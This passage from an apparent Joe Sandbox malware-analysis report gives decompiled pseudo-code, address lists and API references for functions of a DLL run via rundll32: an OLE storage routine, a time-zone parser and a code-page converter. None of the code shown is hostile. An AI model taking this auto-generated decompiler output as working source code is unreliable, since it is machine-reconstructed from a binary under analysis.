				_t174 =  *((intOrPtr*)( *_t173 + 0xc))(_t173,  *((intOrPtr*)(_t228 - 0x20)) + 0xc4);
				 *(_t228 + 0x14) = _t174;
				if(_t174 < 0) {
					goto L43;
				}
				goto L4;
			}










































                                                                        0x1000b8a3
                                                                        0x1000b8b3
                                                                        0x1000b8c4
                                                                        0x1000b8c7
                                                                        0x1000b8ce
                                                                        0x1000b8d1
                                                                        0x1000bba5
                                                                        0x1000bbab
                                                                        0x1000bbb3
                                                                        0x1000bbb3
                                                                        0x1000b8dd
                                                                        0x1000b8e0
                                                                        0x1000b8e3
                                                                        0x1000b8e6
                                                                        0x1000b8ef
                                                                        0x1000b8f7
                                                                        0x1000b8fa
                                                                        0x1000b92d
                                                                        0x1000b92d
                                                                        0x1000b932
                                                                        0x1000b997
                                                                        0x1000b99a
                                                                        0x1000ba06
                                                                        0x1000ba06
                                                                        0x1000ba0a
                                                                        0x1000ba14
                                                                        0x1000ba16
                                                                        0x1000ba18
                                                                        0x1000bb67
                                                                        0x1000bb6a
                                                                        0x1000bb84
                                                                        0x1000bb84
                                                                        0x1000bb89
                                                                        0x1000bb8e
                                                                        0x1000bb8e
                                                                        0x1000bb94
                                                                        0x1000bb9b
                                                                        0x1000bb9b
                                                                        0x1000bba2
                                                                        0x00000000
                                                                        0x1000bba2
                                                                        0x1000bb6c
                                                                        0x1000bb6c
                                                                        0x1000bb70
                                                                        0x1000bb77
                                                                        0x1000bb7a
                                                                        0x1000bb7f
                                                                        0x1000bb82
                                                                        0x1000bb82
                                                                        0x00000000
                                                                        0x1000bb70
                                                                        0x1000ba1e
                                                                        0x1000ba20
                                                                        0x1000ba80
                                                                        0x1000ba83
                                                                        0x1000bb32
                                                                        0x1000bb39
                                                                        0x1000bb39
                                                                        0x1000bb3c
                                                                        0x1000bb3f
                                                                        0x1000bb42
                                                                        0x1000bb45
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000bb4a
                                                                        0x1000bb4c
                                                                        0x1000bb53
                                                                        0x1000bb55
                                                                        0x1000bb64
                                                                        0x1000bb64
                                                                        0x1000bb53
                                                                        0x00000000
                                                                        0x1000bb4a
                                                                        0x1000ba8d
                                                                        0x1000ba90
                                                                        0x1000ba92
                                                                        0x1000ba95
                                                                        0x1000bace
                                                                        0x1000bace
                                                                        0x1000bad5
                                                                        0x1000bad8
                                                                        0x1000bad8
                                                                        0x1000badb
                                                                        0x1000bade
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000bae0
                                                                        0x1000bae9
                                                                        0x1000baef
                                                                        0x1000baf1
                                                                        0x1000baf4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000baf6
                                                                        0x1000bb02
                                                                        0x1000bb05
                                                                        0x1000bb0b
                                                                        0x1000bb0d
                                                                        0x1000bb10
                                                                        0x1000bb12
                                                                        0x1000bb1e
                                                                        0x1000bb21
                                                                        0x1000bb27
                                                                        0x1000bb27
                                                                        0x1000bb2a
                                                                        0x1000ba75
                                                                        0x1000ba78
                                                                        0x00000000
                                                                        0x1000ba78
                                                                        0x1000ba97
                                                                        0x1000ba9e
                                                                        0x1000baa0
                                                                        0x1000baa6
                                                                        0x1000baa8
                                                                        0x1000baab
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000baae
                                                                        0x1000bab4
                                                                        0x1000bab6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000bac0
                                                                        0x1000bac6
                                                                        0x00000000
                                                                        0x1000bac6
                                                                        0x1000ba99
                                                                        0x1000ba9c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000ba9c
                                                                        0x1000ba22
                                                                        0x1000ba29
                                                                        0x1000ba2c
                                                                        0x1000ba32
                                                                        0x1000ba34
                                                                        0x1000ba37
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000ba3d
                                                                        0x1000ba4a
                                                                        0x1000ba4d
                                                                        0x1000ba53
                                                                        0x1000ba55
                                                                        0x1000ba58
                                                                        0x1000ba5a
                                                                        0x1000ba66
                                                                        0x1000ba69
                                                                        0x1000ba6f
                                                                        0x1000ba6f
                                                                        0x1000ba72
                                                                        0x00000000
                                                                        0x1000ba72
                                                                        0x1000b99c
                                                                        0x1000b99c
                                                                        0x1000b9a0
                                                                        0x1000b9aa
                                                                        0x1000b9ac
                                                                        0x1000b9ae
                                                                        0x00000000
                                                                        0x1000b9b0
                                                                        0x1000b9b0
                                                                        0x1000b9b2
                                                                        0x1000b9ce
                                                                        0x1000b9da
                                                                        0x1000b9dd
                                                                        0x1000b9e2
                                                                        0x1000b9ec
                                                                        0x1000b9ef
                                                                        0x1000b9ef
                                                                        0x1000b9ef
                                                                        0x1000b9f6
                                                                        0x1000b9f9
                                                                        0x1000b9b4
                                                                        0x1000b9b4
                                                                        0x1000b9bd
                                                                        0x1000b9bd
                                                                        0x1000b9fe
                                                                        0x00000000
                                                                        0x1000b9fe
                                                                        0x1000b9ae
                                                                        0x1000b937
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000b93d
                                                                        0x1000b944
                                                                        0x1000b945
                                                                        0x1000b94a
                                                                        0x1000b94f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000b953
                                                                        0x1000b954
                                                                        0x1000b955
                                                                        0x1000b956
                                                                        0x1000b95f
                                                                        0x00000000
                                                                        0x1000b961
                                                                        0x1000b970
                                                                        0x1000b973
                                                                        0x1000b976
                                                                        0x1000b983
                                                                        0x1000b986
                                                                        0x1000b98c
                                                                        0x1000b98f
                                                                        0x00000000
                                                                        0x1000b98f
                                                                        0x1000b95f
                                                                        0x1000b8fc
                                                                        0x1000b900
                                                                        0x1000b907
                                                                        0x1000b90e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000b913
                                                                        0x1000b91f
                                                                        0x1000b924
                                                                        0x1000b927
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 1000B8A3
                                                                          • Part of subcall function 1000A2B0: CoGetClassObject.OLE32(?,?,00000000,100430A8,?), ref: 1000A2D0
                                                                          • Part of subcall function 1002A986: __EH_prolog.LIBCMT ref: 1002A98B
                                                                          • Part of subcall function 1002A941: __EH_prolog.LIBCMT ref: 1002A946
                                                                        • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 1000BA2C
                                                                        • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 1000BA4D
                                                                        • GlobalAlloc.KERNEL32(00000000,00000000), ref: 1000BAA0
                                                                        • GlobalLock.KERNEL32 ref: 1000BAAE
                                                                        • GlobalUnlock.KERNEL32(?), ref: 1000BAC6
                                                                        • CreateILockBytesOnHGlobal.OLE32(?,00000001,?), ref: 1000BAE9
                                                                        • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 1000BB05
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: GlobalLock$Bytes$CreateH_prolog$AllocClassDocfileObjectOpenStorageUnlock
                                                                        • String ID:
                                                                        • API String ID: 645133905-0
                                                                        • Opcode ID: 185fddf691f165cf246ba28c1c06a3726dabc5333d542278f897f997fcb1b7b0
                                                                        • Instruction ID: 4fa0019427ba4cc32ee59eeb07c1e68fe65e84f71fb64a57669587eeb3e16f8a
                                                                        • Opcode Fuzzy Hash: 185fddf691f165cf246ba28c1c06a3726dabc5333d542278f897f997fcb1b7b0
                                                                        • Instruction Fuzzy Hash: 73C16A70A0064AEFDB11CF64C888DAEBBB9FF89780B204559F941EB265C771DD41CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10018E14 Relevance: 12.2, APIs: 8, Instructions: 212timeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E10018E14(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t21;
				long _t22;
				char* _t24;
				signed int _t26;
				signed int _t27;
				int _t29;
				char* _t30;
				int _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				int _t36;
				int _t39;
				int _t41;
				int _t44;
				char* _t48;
				signed int _t49;
				void* _t51;
				int _t52;
				signed int _t54;
				void* _t56;
				void* _t58;
				int _t60;
				int _t63;
				void* _t75;
				void* _t76;
				void* _t77;
				signed int _t82;
				char* _t87;
				int _t89;
				void* _t90;

				_push(0x18);
				_push(0x10042cd0);
				E10012514(__ebx, __edi, __esi);
				 *(_t90 - 0x20) = 0;
				E10013A38(__ebx, 0, 7);
				 *(_t90 - 4) = 0;
				_t63 =  *0x1004f734; // 0x0
				 *(_t90 - 0x28) = _t63;
				 *0x1004f814 = 0;
				 *0x1004ce8c =  *0x1004ce8c | 0xffffffff;
				 *0x1004ce80 =  *0x1004ce80 | 0xffffffff;
				_t87 = E1001ADE6("TZ");
				 *((intOrPtr*)(_t90 - 0x24)) = _t87;
				if(_t87 == 0 ||  *_t87 == 0) {
					_t21 =  *0x1004f818; // 0x0
					__eflags = _t21;
					if(__eflags != 0) {
						_push(_t21);
						E100107C8(_t63, 0, _t87, __eflags);
						 *0x1004f818 = 0;
					}
					_t22 = GetTimeZoneInformation(0x1004f768);
					__eflags = _t22 - 0xffffffff;
					if(_t22 == 0xffffffff) {
						goto L31;
					} else {
						 *0x1004f814 = 1;
						_t26 = 0x1004f768->Bias; // 0x0
						_t27 = _t26 * 0x3c;
						 *0x1004cde8 = _t27;
						__eflags =  *0x1004f7ae; // 0x0
						if(__eflags != 0) {
							_t82 =  *0x1004f7bc; // 0x0
							_t39 = _t27 + _t82 * 0x3c;
							__eflags = _t39;
							 *0x1004cde8 = _t39;
						}
						__eflags =  *0x1004f802; // 0x0
						if(__eflags == 0) {
							L22:
							 *0x1004cdec = 0;
							 *0x1004cdf0 = 0;
							goto L23;
						} else {
							_t36 =  *0x1004f810; // 0x0
							__eflags = _t36;
							if(_t36 == 0) {
								goto L22;
							}
							 *0x1004cdec = 1;
							 *0x1004cdf0 = (_t36 -  *0x1004f7bc) * 0x3c;
							L23:
							_t29 = WideCharToMultiByte(_t63, 0, 0x1004f76c, 0xffffffff,  *0x1004ce78, 0x3f, 0, _t90 - 0x1c);
							__eflags = _t29;
							if(_t29 == 0) {
								L26:
								_t30 =  *0x1004ce78; // 0x1004cdf8
								 *_t30 = 0;
								L27:
								_t32 = WideCharToMultiByte(_t63, 0, 0x1004f7c0, 0xffffffff,  *0x1004ce7c, 0x3f, 0, _t90 - 0x1c);
								__eflags = _t32;
								if(_t32 == 0) {
									L30:
									_t33 =  *0x1004ce7c; // 0x1004ce38
									 *_t33 = 0;
									goto L31;
								}
								__eflags =  *(_t90 - 0x1c);
								if( *(_t90 - 0x1c) != 0) {
									goto L30;
								}
								_t34 =  *0x1004ce7c; // 0x1004ce38
								_t34[0x3f] = 0;
								goto L31;
							}
							__eflags =  *(_t90 - 0x1c);
							if( *(_t90 - 0x1c) != 0) {
								goto L26;
							}
							_t35 =  *0x1004ce78; // 0x1004cdf8
							_t35[0x3f] = 0;
							goto L27;
						}
					}
				} else {
					_t41 =  *0x1004f818; // 0x0
					if(_t41 == 0) {
						L6:
						_t44 = E100107B6(E10011820(_t87) + 1);
						 *0x1004f818 = _t44;
						if(_t44 == 0) {
							L31:
							_t24 = E1001095E(_t90 - 0x10, 0xffffffff);
							L47:
							return E1001254F(_t24);
						}
						E10017B90(_t44, _t87);
						_pop(_t75);
						 *(_t90 - 4) =  *(_t90 - 4) | 0xffffffff;
						E1001902F();
						E10019E20( *0x1004ce78, _t87, 3);
						_t48 =  *0x1004ce78; // 0x1004cdf8
						_t48[3] = 0;
						_t89 = _t87 + 3;
						if( *_t89 == 0x2d) {
							 *(_t90 - 0x20) = 1;
							_t89 = _t89 + 1;
						}
						_t49 = E10012749(_t63, _t75, _t90, _t89);
						_pop(_t76);
						 *0x1004cde8 = _t49 * 0xe10;
						while(1) {
							_t51 =  *_t89;
							if(_t51 != 0x2b && (_t51 < 0x30 || _t51 > 0x39)) {
								break;
							}
							_t89 = _t89 + 1;
						}
						__eflags =  *_t89 - 0x3a;
						if( *_t89 != 0x3a) {
							L42:
							__eflags =  *(_t90 - 0x20);
							if( *(_t90 - 0x20) != 0) {
								 *0x1004cde8 =  ~( *0x1004cde8);
							}
							_t52 =  *_t89;
							 *0x1004cdec = _t52;
							__eflags = _t52;
							if(_t52 == 0) {
								_t24 =  *0x1004ce7c; // 0x1004ce38
								 *_t24 = 0;
							} else {
								E10019E20( *0x1004ce7c, _t89, 3);
								_t24 =  *0x1004ce7c; // 0x1004ce38
								_t24[3] = 0;
							}
							goto L47;
						}
						_t89 = _t89 + 1;
						_t54 = E10012749(0x30, _t76, _t90, _t89);
						_pop(_t77);
						 *0x1004cde8 =  *0x1004cde8 + _t54 * 0x3c;
						while(1) {
							_t56 =  *_t89;
							__eflags = _t56 - 0x30;
							if(_t56 < 0x30) {
								break;
							}
							__eflags = _t56 - 0x39;
							if(_t56 > 0x39) {
								break;
							}
							_t89 = _t89 + 1;
							__eflags = _t89;
						}
						__eflags =  *_t89 - 0x3a;
						if( *_t89 != 0x3a) {
							goto L42;
						}
						_t89 = _t89 + 1;
						 *0x1004cde8 =  *0x1004cde8 + E10012749(0x30, _t77, _t90, _t89);
						while(1) {
							_t58 =  *_t89;
							__eflags = _t58 - 0x30;
							if(_t58 < 0x30) {
								goto L42;
							}
							__eflags = _t58 - 0x39;
							if(_t58 > 0x39) {
								goto L42;
							}
							_t89 = _t89 + 1;
							__eflags = _t89;
						}
						goto L42;
					}
					if(E10016D00(_t87, _t41) == 0) {
						goto L31;
					} else {
						_t60 =  *0x1004f818; // 0x0
						_t99 = _t60;
						if(_t60 != 0) {
							_push(_t60);
							E100107C8(_t63, 0, _t87, _t99);
						}
						goto L6;
					}
				}
			}


































                                                                        0x10018e14
                                                                        0x10018e16
                                                                        0x10018e1b
                                                                        0x10018e22
                                                                        0x10018e27
                                                                        0x10018e2d
                                                                        0x10018e30
                                                                        0x10018e36
                                                                        0x10018e39
                                                                        0x10018e3f
                                                                        0x10018e46
                                                                        0x10018e58
                                                                        0x10018e5a
                                                                        0x10018e5f
                                                                        0x10018f1d
                                                                        0x10018f22
                                                                        0x10018f24
                                                                        0x10018f26
                                                                        0x10018f27
                                                                        0x10018f2d
                                                                        0x10018f2d
                                                                        0x10018f38
                                                                        0x10018f3e
                                                                        0x10018f41
                                                                        0x00000000
                                                                        0x10018f47
                                                                        0x10018f4a
                                                                        0x10018f50
                                                                        0x10018f55
                                                                        0x10018f58
                                                                        0x10018f5d
                                                                        0x10018f64
                                                                        0x10018f66
                                                                        0x10018f6f
                                                                        0x10018f6f
                                                                        0x10018f71
                                                                        0x10018f71
                                                                        0x10018f76
                                                                        0x10018f7d
                                                                        0x10018f9e
                                                                        0x10018f9e
                                                                        0x10018fa4
                                                                        0x00000000
                                                                        0x10018f7f
                                                                        0x10018f7f
                                                                        0x10018f84
                                                                        0x10018f86
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10018f88
                                                                        0x10018f97
                                                                        0x10018faa
                                                                        0x10018fc6
                                                                        0x10018fc8
                                                                        0x10018fca
                                                                        0x10018fdc
                                                                        0x10018fdc
                                                                        0x10018fe1
                                                                        0x10018fe4
                                                                        0x10018ffa
                                                                        0x10018ffc
                                                                        0x10018ffe
                                                                        0x10019010
                                                                        0x10019010
                                                                        0x10019015
                                                                        0x00000000
                                                                        0x10019015
                                                                        0x10019000
                                                                        0x10019003
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10019005
                                                                        0x1001900a
                                                                        0x00000000
                                                                        0x1001900a
                                                                        0x10018fcc
                                                                        0x10018fcf
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10018fd1
                                                                        0x10018fd6
                                                                        0x00000000
                                                                        0x10018fd6
                                                                        0x10018f7d
                                                                        0x10018e6e
                                                                        0x10018e6e
                                                                        0x10018e75
                                                                        0x10018e98
                                                                        0x10018ea0
                                                                        0x10018ea7
                                                                        0x10018eae
                                                                        0x10019018
                                                                        0x1001901e
                                                                        0x100190b6
                                                                        0x100190bb
                                                                        0x100190bb
                                                                        0x10018eb6
                                                                        0x10018ebc
                                                                        0x10018ebd
                                                                        0x10018ec1
                                                                        0x10018ecf
                                                                        0x10018ed7
                                                                        0x10018edc
                                                                        0x10018ee0
                                                                        0x10018ee6
                                                                        0x10018ee8
                                                                        0x10018eef
                                                                        0x10018eef
                                                                        0x10018ef1
                                                                        0x10018ef6
                                                                        0x10018efd
                                                                        0x10018f04
                                                                        0x10018f04
                                                                        0x10018f08
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10018f1a
                                                                        0x10018f1a
                                                                        0x10019038
                                                                        0x1001903b
                                                                        0x1001907b
                                                                        0x1001907b
                                                                        0x1001907e
                                                                        0x10019080
                                                                        0x10019080
                                                                        0x10019086
                                                                        0x10019089
                                                                        0x1001908e
                                                                        0x10019090
                                                                        0x100190ae
                                                                        0x100190b3
                                                                        0x10019092
                                                                        0x1001909b
                                                                        0x100190a3
                                                                        0x100190a8
                                                                        0x100190a8
                                                                        0x00000000
                                                                        0x10019090
                                                                        0x1001903d
                                                                        0x1001903f
                                                                        0x10019044
                                                                        0x10019048
                                                                        0x10019055
                                                                        0x10019055
                                                                        0x10019057
                                                                        0x10019059
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10019050
                                                                        0x10019052
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10019054
                                                                        0x10019054
                                                                        0x10019054
                                                                        0x1001905b
                                                                        0x1001905e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10019060
                                                                        0x10019068
                                                                        0x10019075
                                                                        0x10019075
                                                                        0x10019077
                                                                        0x10019079
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10019070
                                                                        0x10019072
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10019074
                                                                        0x10019074
                                                                        0x10019074
                                                                        0x00000000
                                                                        0x10019075
                                                                        0x10018e82
                                                                        0x00000000
                                                                        0x10018e88
                                                                        0x10018e88
                                                                        0x10018e8d
                                                                        0x10018e8f
                                                                        0x10018e91
                                                                        0x10018e92
                                                                        0x10018e97
                                                                        0x00000000
                                                                        0x10018e8f
                                                                        0x10018e82

                                                                        APIs
                                                                        • __lock.LIBCMT ref: 10018E27
                                                                          • Part of subcall function 10013A38: EnterCriticalSection.KERNEL32(?,?,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?), ref: 10013A60
                                                                        • _strlen.LIBCMT ref: 10018E99
                                                                        • _strcat.LIBCMT ref: 10018EB6
                                                                        • _strncpy.LIBCMT ref: 10018ECF
                                                                          • Part of subcall function 100107C8: __lock.LIBCMT ref: 100107E6
                                                                          • Part of subcall function 100107C8: RtlFreeHeap.NTDLL(00000000,?,10041D10,0000000C,10013A1C,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010), ref: 1001082D
                                                                        • GetTimeZoneInformation.KERNEL32(1004F768,10042CD0,00000018,10019429,10042CE0,00000008,10013474,?,?,0000003C,00000000,?,?,0000003C,00000000,?), ref: 10018F38
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,1004F76C,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 10018FC6
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,1004F7C0,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 10018FFA
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide__lock$CriticalEnterFreeHeapInformationSectionTimeZone_strcat_strlen_strncpy
                                                                        • String ID:
                                                                        • API String ID: 3757401926-0
                                                                        • Opcode ID: a9bae9aefb51bf9dcb25716141066ca3c4119656b85ae577e9b21111d529fdd4
                                                                        • Instruction ID: 7381ce5ac415a33791fc082bffc14b542c5be3190c63e6ff879a0c337f862410
                                                                        • Opcode Fuzzy Hash: a9bae9aefb51bf9dcb25716141066ca3c4119656b85ae577e9b21111d529fdd4
                                                                        • Instruction Fuzzy Hash: F871F6308046659EF751CB299E85E593FE9EB4B360F20422EE490DF2E1D770DAC2CB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001A487 Relevance: 12.2, APIs: 8, Instructions: 169COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E1001A487(void* __ebx, void* __edi, int __esi, void* __eflags) {
				intOrPtr _t54;
				int _t56;
				char* _t57;
				int _t68;
				char* _t69;
				int _t70;
				int _t73;
				void* _t77;
				int _t81;
				short* _t82;
				void* _t97;
				short* _t98;

				_t94 = __esi;
				_push(0x38);
				_push(0x10042f10);
				E10012514(__ebx, __edi, __esi);
				_t54 =  *0x1004c470; // 0x1bfbe703
				 *((intOrPtr*)(_t97 - 0x1c)) = _t54;
				 *(_t97 - 0x34) = 0;
				 *(_t97 - 0x44) = 0;
				_t81 =  *( *(_t97 + 0x14));
				 *(_t97 - 0x40) = _t81;
				 *(_t97 - 0x3c) = 0;
				_t56 =  *(_t97 + 8);
				if(_t56 ==  *(_t97 + 0xc)) {
					_t82 =  *(_t97 - 0x48);
					goto L31;
				} else {
					_t85 = _t97 - 0x30;
					if(GetCPInfo(_t56, _t97 - 0x30) != 0 &&  *(_t97 - 0x30) == 1 && GetCPInfo( *(_t97 + 0xc), _t97 - 0x30) != 0 &&  *(_t97 - 0x30) == 1) {
						 *(_t97 - 0x3c) = 1;
					}
					if( *(_t97 - 0x3c) == 0) {
						_t94 =  *(_t97 - 0x38);
					} else {
						if(_t81 == 0xffffffff) {
							_t77 = E10011820( *(_t97 + 0x10));
							_pop(_t85);
							_t94 = _t77 + 1;
							__eflags = _t94;
						} else {
							_t94 = _t81;
						}
						 *(_t97 - 0x38) = _t94;
					}
					if( *(_t97 - 0x3c) != 0) {
						L14:
						 *(_t97 - 4) = 0;
						E10010B20(_t94 + _t94 + 0x00000003 & 0xfffffffc, _t85);
						 *(_t97 - 0x18) = _t98;
						_t82 = _t98;
						 *(_t97 - 0x48) = _t82;
						E10011C50(_t82, 0, _t94 + _t94);
						 *(_t97 - 4) =  *(_t97 - 4) | 0xffffffff;
						_t111 = _t82;
						if(_t82 != 0) {
							L19:
							_t68 = MultiByteToWideChar( *(_t97 + 8), 1,  *(_t97 + 0x10),  *(_t97 - 0x40), _t82, _t94);
							__eflags = _t68;
							if(_t68 == 0) {
								L31:
								__eflags =  *(_t97 - 0x44);
								if(__eflags != 0) {
									_push(_t82);
									E100107C8(_t82, 0, _t94, __eflags);
								}
								_t57 =  *(_t97 - 0x34);
								goto L34;
							}
							__eflags =  *(_t97 + 0x18);
							if( *(_t97 + 0x18) == 0) {
								__eflags =  *(_t97 - 0x3c);
								if(__eflags != 0) {
									L25:
									_push(_t94);
									_push(1);
									_t69 = E1001382A(_t82, 0, _t94, __eflags);
									 *(_t97 - 0x34) = _t69;
									__eflags = _t69;
									if(_t69 != 0) {
										_t70 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94, _t69, _t94, 0, 0);
										__eflags = _t70;
										if(__eflags != 0) {
											__eflags =  *(_t97 - 0x40) - 0xffffffff;
											if( *(_t97 - 0x40) != 0xffffffff) {
												 *( *(_t97 + 0x14)) = _t70;
											}
										} else {
											_push( *(_t97 - 0x34));
											E100107C8(_t82, 0, _t94, __eflags);
											 *(_t97 - 0x34) = 0;
										}
									}
									goto L31;
								}
								_t94 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94, 0, 0, 0, 0);
								__eflags = _t94;
								if(__eflags == 0) {
									goto L31;
								}
								goto L25;
							}
							_t73 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94,  *(_t97 + 0x18),  *(_t97 + 0x1c), 0, 0);
							__eflags = _t73;
							if(_t73 != 0) {
								 *(_t97 - 0x34) =  *(_t97 + 0x18);
							}
							goto L31;
						} else {
							_push(_t94);
							_push(2);
							_t82 = E1001382A(_t82, 0, _t94, _t111);
							if(_t82 != 0) {
								 *(_t97 - 0x44) = 1;
								goto L19;
							}
							goto L17;
						}
					} else {
						_t94 = MultiByteToWideChar( *(_t97 + 8), 1,  *(_t97 + 0x10), _t81, 0, 0);
						 *(_t97 - 0x38) = _t94;
						if(_t94 == 0) {
							L17:
							_t57 = 0;
							L34:
							return E1001254F(E100117AE(_t57,  *((intOrPtr*)(_t97 - 0x1c))));
						}
						goto L14;
					}
				}
			}















                                                                        0x1001a487
                                                                        0x1001a487
                                                                        0x1001a489
                                                                        0x1001a48e
                                                                        0x1001a493
                                                                        0x1001a498
                                                                        0x1001a49d
                                                                        0x1001a4a0
                                                                        0x1001a4a6
                                                                        0x1001a4a8
                                                                        0x1001a4ab
                                                                        0x1001a4ae
                                                                        0x1001a4b4
                                                                        0x1001a62d
                                                                        0x00000000
                                                                        0x1001a4ba
                                                                        0x1001a4ba
                                                                        0x1001a4c9
                                                                        0x1001a4e4
                                                                        0x1001a4e4
                                                                        0x1001a4ee
                                                                        0x1001a50a
                                                                        0x1001a4f0
                                                                        0x1001a4f3
                                                                        0x1001a4fc
                                                                        0x1001a501
                                                                        0x1001a504
                                                                        0x1001a504
                                                                        0x1001a4f5
                                                                        0x1001a4f5
                                                                        0x1001a4f5
                                                                        0x1001a505
                                                                        0x1001a505
                                                                        0x1001a510
                                                                        0x1001a52c
                                                                        0x1001a52c
                                                                        0x1001a538
                                                                        0x1001a53d
                                                                        0x1001a540
                                                                        0x1001a542
                                                                        0x1001a54b
                                                                        0x1001a553
                                                                        0x1001a570
                                                                        0x1001a572
                                                                        0x1001a592
                                                                        0x1001a59f
                                                                        0x1001a5a5
                                                                        0x1001a5a7
                                                                        0x1001a630
                                                                        0x1001a630
                                                                        0x1001a633
                                                                        0x1001a635
                                                                        0x1001a636
                                                                        0x1001a63b
                                                                        0x1001a63c
                                                                        0x00000000
                                                                        0x1001a63c
                                                                        0x1001a5ad
                                                                        0x1001a5b0
                                                                        0x1001a5d2
                                                                        0x1001a5d5
                                                                        0x1001a5ed
                                                                        0x1001a5ed
                                                                        0x1001a5ee
                                                                        0x1001a5f0
                                                                        0x1001a5f7
                                                                        0x1001a5fa
                                                                        0x1001a5fc
                                                                        0x1001a608
                                                                        0x1001a60e
                                                                        0x1001a610
                                                                        0x1001a620
                                                                        0x1001a624
                                                                        0x1001a629
                                                                        0x1001a629
                                                                        0x1001a612
                                                                        0x1001a612
                                                                        0x1001a615
                                                                        0x1001a61b
                                                                        0x1001a61b
                                                                        0x1001a610
                                                                        0x00000000
                                                                        0x1001a5fc
                                                                        0x1001a5e7
                                                                        0x1001a5e9
                                                                        0x1001a5eb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001a5eb
                                                                        0x1001a5c0
                                                                        0x1001a5c6
                                                                        0x1001a5c8
                                                                        0x1001a5cd
                                                                        0x1001a5cd
                                                                        0x00000000
                                                                        0x1001a574
                                                                        0x1001a574
                                                                        0x1001a575
                                                                        0x1001a57e
                                                                        0x1001a582
                                                                        0x1001a58b
                                                                        0x00000000
                                                                        0x1001a58b
                                                                        0x00000000
                                                                        0x1001a582
                                                                        0x1001a512
                                                                        0x1001a523
                                                                        0x1001a525
                                                                        0x1001a52a
                                                                        0x1001a584
                                                                        0x1001a584
                                                                        0x1001a63f
                                                                        0x1001a64f
                                                                        0x1001a64f
                                                                        0x00000000
                                                                        0x1001a52a
                                                                        0x1001a510

                                                                        APIs
                                                                        • GetCPInfo.KERNEL32(00000000,?,10042F10,00000038,100185C0,?,00000000,00000000,10012C1E,00000000,00000000,10042730,0000001C,1001294D,00000001,00000020), ref: 1001A4C5
                                                                        • GetCPInfo.KERNEL32(00000000,00000001), ref: 1001A4D8
                                                                        • _strlen.LIBCMT ref: 1001A4FC
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,10012C1E,?,00000000,00000000), ref: 1001A51D
                                                                        Memory Dump Source
